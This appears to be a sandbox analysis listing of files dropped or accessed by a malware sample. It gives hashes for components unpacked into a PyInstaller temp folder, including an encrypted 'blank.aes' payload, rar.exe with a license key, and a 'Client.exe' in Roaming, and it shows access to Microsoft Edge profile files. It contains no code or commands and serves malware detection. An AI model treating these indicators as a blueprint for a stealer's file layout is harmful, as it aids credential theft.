C:\Users\Admin\AppData\Local\Temp\_MEI60922\unicodedata.pyd
| MD5 | 6dd43e115402d9e1c7cd6f21d47cfcf5 |
| SHA1 | c7fb8f33f25b0b75fc05ef0785622aa4ec09503c |
| SHA256 | 2a00f41bbc3680807042fc258f63519105220053fb2773e7d35480515fad9233 |
| SHA512 | 72e266eb1ce5cbbcfd1d2a6f864538efd80b3ed844e003e2bd9566708fee0919447290a3b559ea27c32794f97a629a8fe8fc879654ffa609fca5c053dac70c69 |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\sqlite3.dll
| MD5 | 68b435a35f9dcbc10b3cd4b30977b0bd |
| SHA1 | 9726ef574ca9bda8ec9ab85a5b97adcdf148a41f |
| SHA256 | 240d6d3efac25af08fe41a60e181f8fdcb6f95da53b3fad54b0f96680e7a8277 |
| SHA512 | 8e133b72bd3776f961258793c2b82d2cd536c7ae0ed0241daa2f67d90a6968f563b72f74a1c33d9bdfb821b796612faa7a73a712369ff3b36d968e57bfcdd793 |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\select.pyd
| MD5 | 33722c8cd45091d31aef81d8a1b72fa8 |
| SHA1 | e9043d440235d244ff9934e9694c5550cae2d5ab |
| SHA256 | 366fca0b27a34835129086c8cde1e75c309849e37091db4adeda1be508f2ee12 |
| SHA512 | 74217abec2727baaa5138e1b1c4bac7d0ca574cf5a377396fc1ca0d3c07beb8aaa374e8060d2b5f707426312c11e0a34527ee0190e979e996f3b822efa24852f |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\libssl-3.dll
| MD5 | 264be59ff04e5dcd1d020f16aab3c8cb |
| SHA1 | 2d7e186c688b34fdb4c85a3fce0beff39b15d50e |
| SHA256 | 358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d |
| SHA512 | 9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248 |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\libcrypto-3.dll
| MD5 | 7f1b899d2015164ab951d04ebb91e9ac |
| SHA1 | 1223986c8a1cbb57ef1725175986e15018cc9eab |
| SHA256 | 41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986 |
| SHA512 | ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\blank.aes
| MD5 | febe7f583d8a00d10d03b7eeabeb0f89 |
| SHA1 | 0462c069249240aea09799f0b5306b9cecdb11e0 |
| SHA256 | 4cc9dbca92848a67b0d4cb0b7f7a97b7176bc364fc44470700eff40f499a2d6a |
| SHA512 | 46debbd4f755456f23f9cd1b3bf02a67395b02f488b18e863171d5c85218f11fa8960e05974c6956230d924bd722d4173121815b5a654fcf7ffd00e764c8b57b |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
C:\Users\Admin\AppData\Local\Temp\_MEI60922\base_library.zip
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_035xnzlg.0l1.ps1
C:\Users\Admin\AppData\Local\Temp\_MEI45922\blank.aes
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\2c2b373f-6525-404d-a22e-baece3a1944c.tmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe594b48.TMP
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State